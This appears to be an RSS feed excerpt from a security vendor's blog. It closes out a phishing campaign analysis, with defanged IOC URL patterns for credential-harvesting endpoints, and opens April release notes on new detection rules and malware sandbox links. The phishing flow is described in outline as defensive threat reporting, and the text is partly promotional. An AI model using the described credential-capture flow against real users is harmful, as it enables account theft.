<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="567" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/imagea-1024x567.png" alt="Google authorization form used for the phishing attack " class="wp-image-20685" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/imagea-1024x567.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/imagea-300x166.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/imagea-768x425.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/imagea-1536x851.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/imagea-370x205.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/imagea-270x150.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/imagea-740x410.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/imagea.png 1870w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Google&nbsp;authorization&nbsp;form&nbsp;used&nbsp;for&nbsp;the&nbsp;phishing&nbsp;attack</em>&nbsp;</figcaption></figure></div>


<p>When&nbsp;the&nbsp;user&nbsp;enters&nbsp;their&nbsp;login&nbsp;and&nbsp;password,&nbsp;the&nbsp;page&nbsp;sends&nbsp;<strong>POST</strong>&nbsp;requests&nbsp;to&nbsp;the&nbsp;/pass.php&nbsp;and&nbsp;/mlog.php&nbsp;endpoints.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="961" height="133" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image1f.png" alt="POST requests sent to the /pass.php " class="wp-image-20688" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image1f.png 961w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image1f-300x42.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image1f-768x106.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image1f-370x51.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image1f-270x37.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image1f-740x102.png 740w" sizes="(max-width: 961px) 100vw, 961px" /><figcaption class="wp-element-caption"><em>POST&nbsp;requests&nbsp;sent&nbsp;to&nbsp;the&nbsp;/pass.php</em>&nbsp;</figcaption></figure></div>


<p>The request to&nbsp;/pass.php&nbsp;sends the login and the request to&nbsp;/mlog.php&nbsp;sends the password:&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="179" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/screen_2-1024x179.png" alt="" class="wp-image-20689" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/screen_2-1024x179.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/screen_2-300x53.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/screen_2-768x134.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/screen_2-370x65.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/screen_2-270x47.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/screen_2-740x130.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/screen_2.png 1200w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Request to&nbsp;/pass.php&nbsp;sends the login</em></figcaption></figure></div>


<p>Then, the page sends a request to the `/check_telegram_updates.php` endpoint, with the user ID included in the request body.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="207" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image23-1024x207.png" alt="Visitor ID exposed inside ANY.RUN sandbox " class="wp-image-20690" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image23-1024x207.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image23-300x61.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image23-768x155.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image23-370x75.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image23-270x55.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image23-740x149.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image23.png 1045w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Visitor&nbsp;ID&nbsp;exposed&nbsp;inside&nbsp;ANY.RUN&nbsp;sandbox</em>&nbsp;</figcaption></figure></div>


<p>At the end of the chain, the victim is redirected to the legitimate&nbsp;<strong>google.com</strong>&nbsp;page.&nbsp;</p>



<h2 class="wp-block-heading">How CISOs Can Reduce the Risk Behind Fake Invitation Campaigns&nbsp;</h2>



<p>Campaigns like this are difficult because they do not create one obvious security event. The same lure can lead to credential theft, OTP interception, or remote access tool installation. For SOC teams, that means the risk is spread across several small signals that need to be connected quickly.&nbsp;</p>



<p>To reduce exposure, security leaders need visibility earlier in the chain, before stolen credentials are used, before OTP codes are intercepted, and before a remote access tool becomes a foothold inside the environment.&nbsp;</p>



<p>ANY.RUN brings that visibility into the full SOC investigation process. During triage, analysts can open suspicious links safely inside a cloud-based,&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">interactive&nbsp;sandbox</a>&nbsp;and quickly confirm whether the page leads to a fake invitation, credential form, OTP prompt, or RMM download. During behavioral analysis, they can&nbsp;observe&nbsp;network requests, credential submission endpoints, file downloads, execution behavior, and remote access activity as it happens.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="568" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-12.26.10-1024x568.png" alt="Phishing attack analyzed inside ANY.RUN sandbox " class="wp-image-20691" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-12.26.10-1024x568.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-12.26.10-300x166.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-12.26.10-768x426.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-12.26.10-1536x852.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-12.26.10-2048x1136.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-12.26.10-370x205.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-12.26.10-270x150.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-12.26.10-740x411.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Phishing attack analyzed inside ANY.RUN&nbsp;sandbox</em>&nbsp;</figcaption></figure></div>


<p>That visibility gives teams a stronger basis for response.&nbsp;Teams&nbsp;will&nbsp;understand what was exposed, whether access was&nbsp;attempted, and which containment steps are needed. With <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">ANY.RUN Threat Intelligence</a>, they can extend the investigation into threat hunting by finding related domains, repeated URL patterns, shared phishing infrastructure, and similar analyses across industries.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="552" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-12.22.20-1024x552.png" alt="Relevant analysis sessions displayed inside TI Lookup for broader context and full behavior visibility" class="wp-image-20692" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-12.22.20-1024x552.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-12.22.20-300x162.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-12.22.20-768x414.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-12.22.20-1536x828.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-12.22.20-2048x1104.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-12.22.20-370x199.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-12.22.20-270x146.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/Screenshot-2026-05-05-at-12.22.20-740x399.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Relevant analysis sessions displayed inside TI&nbsp;Lookup&nbsp;for broader context and full behavior visibility</em></figcaption></figure></div>


<p>For CISOs, this supports the outcomes that matter most:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Fewer gray-zone investigations</strong>&nbsp;where teams struggle to prove whether activity is malicious&nbsp;</li>



<li><strong>Faster threat confirmation</strong>&nbsp;before credentials, OTP codes, or remote access are abused&nbsp;</li>



<li><strong>Clearer containment decisions</strong>&nbsp;based on visible attack behavior, not assumptions&nbsp;</li>



<li><strong>Stronger phishing coverage</strong>&nbsp;across both credential theft and RMM delivery paths&nbsp;</li>



<li><strong>Better confidence in SOC readiness</strong>&nbsp;when phishing campaigns scale across domains and industries&nbsp;</li>
</ul>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Turn phishing uncertainty into response-ready evidence.  
 <br>
<span class="highlight">Make every phishing investigation faster and easier to act on.  <br></span></p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=US-fake-invitation-phishing&#038;utm_term=050526&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Power up your SOC
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">About&nbsp;ANY.RUN&nbsp;</h2>



<p>ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams detect, investigate, and respond to threats faster.</p>



<p>ANY.RUN solutions include <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener"><strong>Interactive Sandbox</strong></a>, <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener"><strong>Threat Intelligence Lookup</strong></a>, <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener"><strong>Threat Intelligence Feeds</strong></a>, and integrations for SOC workflows across SIEM, SOAR, EDR, and other security tools. Together, they help teams safely analyze suspicious links, files, and scripts, uncover phishing behavior, trace credential theft and remote access activity, and enrich investigations with real-world threat context.</p>



<p>Built for security-conscious organizations, ANY.RUN is <a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktocompliance" target="_blank" rel="noreferrer noopener"><strong>SOC 2 Type II attested</strong></a> and supports enterprise-ready controls such as <strong>SSO, MFA, granular privacy settings, and AES-256-CBC encryption</strong>.</p>



<p>Trusted by more than <strong>15,000 organizations</strong> and <strong>600,000 security professionals worldwide</strong>, ANY.RUN gives SOC teams the visibility they need to move from uncertain alerts to evidence-based decisions.</p>



<h2 class="wp-block-heading">Indicators&nbsp;of&nbsp;Compromise&nbsp;</h2>



<p><strong>URL&nbsp;patterns:&nbsp;</strong></p>



<p>hxxps://&lt;phish_site&gt;/&lt;url-pattern&gt;/Image/office360.png&nbsp;</p>



<p>hxxps://&lt;phish_site&gt;/&lt;url-pattern&gt;/Image/office.png&nbsp;</p>



<p>hxxps://&lt;phish_site&gt;/&lt;url-pattern&gt;/Image/yahoo.png&nbsp;</p>



<p>hxxps://&lt;phish_site&gt;/&lt;url-pattern&gt;/Image/google.png&nbsp;</p>



<p>hxxps://&lt;phish_site&gt;/&lt;url-pattern&gt;/Image/aol.png&nbsp;</p>



<p>hxxps://&lt;phish_site&gt;/&lt;url-pattern&gt;/Image/email.png&nbsp;</p>



<p>hxxps://&lt;phish_site&gt;/blocked.html&nbsp;</p>



<p>hxxps://&lt;phish_site&gt;/&lt;url-pattern&gt;/processmail.php&nbsp;</p>



<p>hxxps://&lt;phish_site&gt;/&lt;url-pattern&gt;/process.php&nbsp;</p>



<p>hxxps://&lt;phish_site&gt;/&lt;url-pattern&gt;/pass.php&nbsp;</p>



<p>hxxps://&lt;phish_site&gt;/&lt;url-pattern&gt;/mlog.php&nbsp;</p>



<p>hxxps://&lt;phish_site&gt;/&lt;url-pattern&gt;/check_telegram_updates.php&nbsp;</p>



<p><strong>Domains</strong>:</p>



<p>The current list of domains can be retrieved using the following query in&nbsp;<strong>ANY.RUN Threat Intelligence&nbsp;Lookup</strong>:&nbsp;<a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=US-fake-invitation-phishing&amp;utm_term=050526&amp;utm_content=linktotilookup#{%22query%22:%22url:%5C%22/blocked.html%5C%22%20AND%20url:%5C%22/favicon.ico%5C%22%20and%20url:%5C%22/Image/*.png%5C%22%22,%22dateRange%22:180}" target="_blank" rel="noreferrer noopener">url:&#8221;/blocked.html&#8221; AND url:&#8221;/favicon.ico&#8221; and url:&#8221;/Image/*.png&#8221;</a></p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/us-fake-invitation-phishing/">New Phishing Campaign Targets US with Credential Theft: What CISOs Need to Know</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/us-fake-invitation-phishing/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Release Notes: Expanded Threat Intelligence Access, AI Assisted Search 1,770 New Detections and More</title>
		<link>https://any.run/cybersecurity-blog/release-notes-april-2026/</link>
					<comments>https://any.run/cybersecurity-blog/release-notes-april-2026/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Thu, 30 Apr 2026 11:57:42 +0000</pubDate>
				<category><![CDATA[Service Updates]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[update]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=20643</guid>

					<description><![CDATA[<p>April brought several updates across ANY.RUN’s Threat Intelligence and detection coverage.&#160; The biggest change is expanded access to Threat Intelligence: Free plan users now get&#160;20 premium requests in TI Lookup and YARA Search. This gives security teams a practical way to check suspicious indicators, explore related sandbox sessions, and&#160;validate&#160;malware or phishing activity using real attack [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/release-notes-april-2026/">Release Notes: Expanded Threat Intelligence Access, AI Assisted Search 1,770 New Detections and More</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>April brought several updates across ANY.RUN’s Threat Intelligence and detection coverage.&nbsp;</p>



<p>The biggest change is expanded access to Threat Intelligence: Free plan users now get&nbsp;<strong>20 premium requests in TI Lookup and YARA Search</strong>. This gives security teams a practical way to check suspicious indicators, explore related sandbox sessions, and&nbsp;validate&nbsp;malware or phishing activity using real attack data.&nbsp;</p>



<p>On the detection side, our team added&nbsp;<strong>78 new&nbsp;behavior&nbsp;signatures</strong>,&nbsp;<strong>1,657 new Suricata rules</strong>, and&nbsp;<strong>35 new YARA rules</strong>. We also released new Threat Intelligence Reports covering malware, loaders, RATs, backdoors, and supply-chain threats&nbsp;observed&nbsp;in recent submissions.&nbsp;</p>



<p>Here’s&nbsp;a closer look at&nbsp;what’s&nbsp;new.&nbsp;</p>



<h2 class="wp-block-heading">Product Updates&nbsp;</h2>



<p>In April, ANY.RUN expanded access to&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence</a>&nbsp;capabilities, giving more teams a way to test threat context directly in their SOC workflows.&nbsp;</p>



<p>The key update:&nbsp;<a href="https://any.run/plans-ti/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktotipricing" target="_blank" rel="noreferrer noopener"><strong>Free plan users</strong></a><strong>&nbsp;now get 20 premium requests in TI Lookup and&nbsp;</strong><a href="https://intelligence.any.run/analysis/yara?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktolookup" target="_blank" rel="noreferrer noopener"><strong>YARA Search</strong></a><strong>.</strong>&nbsp;This gives security teams a practical way to check indicators, explore related sandbox sessions, and&nbsp;validate&nbsp;suspicious activity using real attack data from ANY.RUN’s community.&nbsp;</p>



<h3 class="wp-block-heading"><em>More Threat Context with 20 Premium TI Requests</em>&nbsp;</h3>



<p>Threat intelligence brings the most value when it helps teams make faster decisions during active investigations. Instead of stopping at one suspicious IP, domain, hash, or&nbsp;behavior, analysts can pivot to connected samples, infrastructure, artifacts, and attack context.&nbsp;</p>



<p>With 20 premium requests now included in the Free plan, SOC and MSSP teams can explore threat data across IOCs, IOBs, and IOAs linked to recent malware and phishing activity.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="540" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_0.png-1024x540.webp" alt="" class="wp-image-20644" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_0.png-1024x540.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_0.png-300x158.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_0.png-768x405.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_0.png-370x195.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_0.png-270x142.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_0.png-740x390.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_0.png.webp 1522w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI&nbsp;Lookup request with AI assistant that helps the user&nbsp;select sandbox analyses of malware using a TTP</em></figcaption></figure></div>


<p>Teams can use this expanded access across key SOC workflows:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Alert triage:</strong>&nbsp;Check suspicious indicators against&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">real sandbox data</a>&nbsp;and get more context before closing or escalating an alert.&nbsp;</li>



<li><strong>Incident response:</strong>&nbsp;Pivot from one indicator to related artifacts, infrastructure, and&nbsp;behavior&nbsp;to understand the wider attack chain.&nbsp;</li>



<li><strong>Threat hunting:</strong>&nbsp;Use TI Lookup and YARA Search to test hypotheses against real-world malware data.</li>



<li><strong>Detection work:</strong>&nbsp;Find patterns and artifacts that can support new or improved detection logic.&nbsp;</li>
</ul>



<p>ANY.RUN also introduced&nbsp;<strong>AI-assisted search in TI Lookup</strong>, allowing users to describe what they need in natural language while the system helps translate the request into a structured query.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Give your team the context for faster triage and response. <br>
<span class="highlight">Test ANY.RUN Threat Intelligence in real SOC workflows. <br></span></p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/plans-ti/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=release-notes-april-2026&#038;utm_term=300426&#038;utm_content=linktotipricing#contact-sales" rel="noopener" target="_blank">
Contact us
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p>With threat intelligence available directly in the workflow, SOC and MSSP teams can move faster from suspicious signal to confident action:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Faster alert validation:</strong>&nbsp;Teams can check suspicious indicators against real attack data and make decisions sooner.&nbsp;</li>



<li><strong>Lower escalation noise:</strong>&nbsp;More context helps reduce escalations driven by uncertainty.&nbsp;</li>



<li><strong>Shorter investigations:</strong>&nbsp;Analysts can move from one indicator to related samples, infrastructure, and&nbsp;behavior&nbsp;faster.&nbsp;</li>



<li><strong>Stronger threat hunting:</strong>&nbsp;Teams can test hypotheses against current malware and phishing data.&nbsp;</li>



<li><strong>Better detection quality:</strong>&nbsp;Real-world artifacts and&nbsp;behavior&nbsp;patterns can support more relevant detection logic.&nbsp;</li>



<li><strong>More measurable security value:</strong>&nbsp;Faster triage, better prioritization, and clearer evidence help teams focus capacity on confirmed risk.&nbsp;</li>
</ul>



<h2 class="wp-block-heading">Threat Coverage Updates&nbsp;</h2>



<p>In April, our detection team continued to strengthen ANY.RUN’s threat coverage with new&nbsp;behavior&nbsp;signatures, Suricata rules, and YARA rules.&nbsp;</p>



<p>This month’s updates include:&nbsp;</p>



<ul class="wp-block-list">
<li>78 new&nbsp;behavior&nbsp;signatures&nbsp;</li>



<li>1,657 new Suricata rules&nbsp;</li>



<li>35 new YARA rules&nbsp;</li>
</ul>



<p>These additions help expand detection coverage across suspicious&nbsp;behavior, network activity, and file-based indicators.&nbsp;</p>



<h3 class="wp-block-heading">New&nbsp;Behavior&nbsp;Signatures&nbsp;&nbsp;</h3>



<p>In April, we added&nbsp;<strong>78 new&nbsp;behavior&nbsp;signatures</strong>&nbsp;covering malware-specific activity, mutex-based indicators, suspicious persistence&nbsp;behavior, and exploitation-related activity.&nbsp;</p>



<p>The new signatures focus on observable actions and artifacts that appear during detonation, helping teams move beyond file reputation and confirm what a sample&nbsp;actually does&nbsp;in the sandbox.&nbsp;</p>



<p>Highlighted detections include:&nbsp;</p>



<div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-grid wp-container-core-group-is-layout-1 wp-block-group-is-layout-grid">
<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/1b4372dc-2726-4cd7-9ba6-eb4d7dc69bb5?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Sextor mutex</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/0adad70f-7bd8-4643-be28-406d36423e61?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">BlindEagle</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/04d13abc-5717-4f2b-96aa-6b96604237c2?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">SantaStealer</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/0667857e-51c3-4f16-ae85-5cc55e2b0dba?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Raton</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/049e5062-8191-4cc9-b72a-64c8a7f94be3?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">SpankRAT</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/487516cc-f2af-411d-a5d1-46216fe09d29?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">CVE-2026-34621</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/1b4bd54b-ab2f-4dc2-bc6f-11a9d6aaf777?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">GetWell mutex</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/2581d703-26ba-45ae-a7f6-73d691eb38f3?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">NinjaRMM mutex</a>&nbsp;</li>
</ul>
</div></div>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="567" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-15.25.35-1024x567.png" alt="Killada detected inside ANY.RUN sandbox" class="wp-image-20645" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-15.25.35-1024x567.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-15.25.35-300x166.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-15.25.35-768x425.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-15.25.35-1536x850.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-15.25.35-2048x1133.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-15.25.35-370x205.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-15.25.35-270x149.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-15.25.35-740x409.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Killada detected inside ANY.RUN sandbox</em></figcaption></figure></div>


<div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-grid wp-container-core-group-is-layout-2 wp-block-group-is-layout-grid">
<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/0d473778-5756-4bed-bf96-b322a1c310f7?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">CrystalX</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/1eb1531f-5369-496b-93f9-b0cc1a26f7af?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">VexxStealer</a>&nbsp;</li>
</ul>



